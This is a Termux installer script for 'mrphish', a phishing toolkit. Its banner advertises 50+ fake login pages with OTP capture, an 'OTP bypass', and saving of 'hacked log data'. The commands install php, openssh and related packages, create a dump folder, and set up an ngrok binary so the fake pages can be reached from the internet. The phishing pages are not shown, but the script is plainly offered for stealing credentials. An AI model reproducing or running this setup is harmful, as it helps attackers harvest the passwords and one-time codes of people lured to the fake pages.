
echo -e "\e[96m      |-----------------------[V 1.1]-----------------------|"
echo -e "\e[96m      |----------------------\e[92mUPDATE V1.1\e[96m--------------------|"
echo -e "\e[96m      |-----------------------------------------------------|"
echo -e "\e[96m      |                                                     |"
echo -e "\e[96m      |            > 50+ latest pages with otp options      |"
echo -e "\e[96m      |            > 5+ categories most demanding           |"
echo -e "\e[96m      |            > Ngrok time removed, link works         |"
echo -e "\e[96m      |            > Optimized pages and interface          |"
echo -e "\e[96m      |            > Latest otp bypass with java timer      |"
echo -e "\e[96m      |            > Hacked log data save feature           |"
echo -e "\e[96m      |            > Sound alert mode                       |"
echo -e "\e[96m      |            > New interface neon mode                |"
echo -e "\e[96m      |                                                     |"
echo -e "\e[96m      |-----------------------------------------------------|"
echo -e "\e[96m      |-----------------------\e[91mFEATURES\e[96m----------------------|"
echo -e "\e[96m      |-----------------------------------------------------|"
sleep 14.0
clear
echo -e "\e[96m      |------------[ INSTALLATION STARTED ]-----------------|"
echo -e "\e[96m      |-------[KEEP YOUR DEVICE AWAY FOR WHILE]-------------|"
sleep 8.0
apt-get update -y
apt-get upgrade -y
termux-setup-storage
pkg install git -y
pkg install zip -y
pkg install mpv -y
pkg install wget -y
pkg install openssh -y
pkg install python -y
pkg install python2 -y
pkg install nano -y
pkg install php -y
pip install lolcat 
cd /sdcard
mkdir dUmpS
cd $HOME/mrphish
mv log.mp3 /sdcard
cd $HOME/mrphish/core
chmod +x ngrok
mv ngrok $HOME
cd $HOME
clear
echo -e '\e[96m          [\e[92mNGROK SETUP\e[96m]--------------'
echo -e '\e[96m                           |'
echo -e '\e[92m    NGROK IS NOT WORKING WITH WIFI USERS BUT DONT WORRY'
echo -e '\e[92m    JUST PASTE AUTH CODE BY WATCHING VIDEO THEN YOU CAN'
echo -e '\e[92m        USE NGROK WITHOUT ANY ISSUE, GET LINK BELOW'
echo
echo -e '\e[92m      VIDEO LINK :- [ https://youtu.be/c0fV8liYbcE ]'
echo
